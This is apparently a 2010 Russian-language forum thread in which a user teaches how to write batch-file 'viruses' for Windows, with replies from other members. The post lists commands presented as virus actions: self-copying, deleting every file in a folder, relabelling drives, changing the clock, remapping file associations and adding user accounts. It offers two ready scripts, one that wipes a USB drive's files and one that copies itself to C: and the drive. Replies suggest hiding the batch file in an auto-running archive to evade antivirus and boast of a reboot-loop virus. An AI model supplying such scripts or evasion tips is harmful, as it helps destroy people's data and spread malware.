Итак тут я раскажу как сделать простую программку на ЯП Bat где скачать не скажу тк она идет в Win32 и не требует компилятора. Нам нужен блокнот, ОС Windows и прямые руки ) Запустим блокнот и введем
Code
Taskmgr
Жмем сохранить > там где расширение *.txt меняем на "все файлы" и вводим имя "Диспетчер задач.bat" сохраняем, запускаем и у нас на мониторе красуется диспетчер задач. Вот небольшой список команд:
Code
1) «copy %0 x:\y» - копирует вирус на диск x в папку y (пример copy %0 C:\System.bat); 2) «label x:y» - переименовывает диск x на имя y (пример label C:error); 3) «time х:у» - меняет время на х часов и у минут (пример time 14:27); 4) «date x.y.z» - меняет дату на x день, y месяц, z лет (пример date 16.11.05); 5) «md х» - создаст папку, в том месте, где наш вирус, с именем х (пример md Papka); 6) «del *.* /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок); 7) «del x:\y *.* /q» - удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q); 8) «assoc .х=.у» - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.mp3); 9) «net user "х" /add» - добавит на компьютер пользователя под именем х (пример net user "Smoked" /add); Вот две программки вам на рассмотрение, можете их использовать без моего соглашения, но, используя их, вы принимаете соглашение пользователя. 1)Программа для удаления файлов с флешки (если та вставлена) и переименования ее.
del F:\ *.* /q label F:HACK
2)Программа для изменения даты и времени на компьютере и копирования ее на диск C и на флешку.
time 14:13 date 11.07.12 copy %0 C:\Time.bat copy %0 F:\Time.bat
Восновном этот ЯП используется хакерами для написания вирусов, брутов и фэйков
Если помог, можно и плюсик поставить +
Сообщение отредактировал: r_bit - Среда, 15.12.2010, 09:23
r_bit, да.. бат-вирусы - дело веселое) еще пакуешь в архив и ставишь в архиве автозапуск батника при установке, так ни один антивирус не поймает Make games, not war!
r_bit, эн-нет. не отформатирует он его. я тебе гарантирую. винда напишет, что ты ололо и пытаешься форматнуть диск, который сейчас используешь. Make games, not war!
укропчик этот код именно все вместе с виндой удаляет уменя еще на вмваре виндов хп получилось сделать вирус который без конца комп перезагружает =) моу кодом поделится )